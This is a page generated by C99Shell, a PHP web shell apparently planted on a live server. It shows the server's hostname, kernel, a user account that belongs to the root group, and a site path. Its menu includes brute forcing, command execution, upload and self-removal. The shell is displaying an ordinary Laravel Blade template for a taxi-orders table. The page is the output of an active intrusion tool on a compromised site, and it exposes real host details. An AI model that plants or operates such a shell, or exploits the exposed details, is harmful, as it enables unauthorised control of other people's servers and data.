!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/modules/Cockpit/Resources/views/   drwxr-xr-x
Free 29.26 GB of 117.98 GB (24.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (3.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('general.master', $setup);

@section('thecontent')
<div class="actions">
    <h2 class="text-white">{{ __('Orders') }}</h2>
</div><br />
<div class="table-responsive">

    <div>
        <table class="table align-items-center table-dark">
            <thead class="thead-dark">
                <tr>
                    <th scope="col" class="sort" data-sort="status">{{ __('ID')}}</th>
                    <th scope="col" class="sort" data-sort="phone">{{ __('Client phone')}}</th>
                    <th scope="col" class="sort" data-sort="budget">{{ __('Time')}}</th>
                    <th scope="col" class="sort" data-sort="status">{{ __('Status')}}</th>
                    <th scope="col" class="sort" data-sort="status">{{ __('From')}}</th>
                    <th scope="col" class="sort" data-sort="status">{{ __('To')}}</th>
                    <th scope="col" class="sort" data-sort="driver">{{ __('Driver')}}</th>
                    <th scope="col" class="sort" data-sort="status">{{ __('Distance')}}</th>
                    <th scope="col" class="sort" data-sort="status">{{ __('Price')}}</th>
                    
                    
                   
                </tr>
            </thead>
            <tbody class="list">
               @foreach ($orders as $order)
                   
              
               <tr>
                <td class="action">
                    <a href="{{ route('orders.show',$order->id ) }}" class="text-white">#{{ $order->id_formated }}</a>
                </td>
                <th scope="row">
                    <div class="media align-items-center">
                            <span class="name mb-0 text-sm"><a href="tel:{{$order->phone}}" class="text-white">{{ $order->phone }}</a></span>   
                    </div>
                </th>
                <td class="time">
                    {{ $order->created_at->diffForHumans()}}
                </td>
                <td>
                    <span class="badge badge-dot mr-4">
                      <i class="bg-warning"></i>
                      <span class="status">{{ __($order->displayLastStatus()) }}</span>
                    </span>
                </td>
                <td class="from">
                    {{ $order->pickup_address }}
                </td>
                <td class="to">
                    {{ $order->delivery_address }}
                </td>
                <td class="driver">
                    @if ($order->driver)
                    <a target="_blank" href="{{ route('drivers.edit',$order->driver->id) }}" class="text-white">{{ $order->driver->name }}</a>
                    @endif
                </td>
                <td class="from">
                    {{ $order->distance }} km
                </td>
                <td class="to">
                     @money( $order->delivery_price, config('settings.cashier_currency'),config('settings.do_convertion'))
                </td>
                
                
            </tr>
            @endforeach
               
                
               
                
            </tbody>
        </table>
        <div class="card-footer py-4">
            @if(count($orders))
            <nav class="d-flex justify-content-end" aria-label="...">
                {{ $orders->appends(Request::all())->links() }}
            </nav>
            @else
                <h4>{{ __('You don`t have any orders') }} ...</h4>
            @endif
        </div>
    </div>
    
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--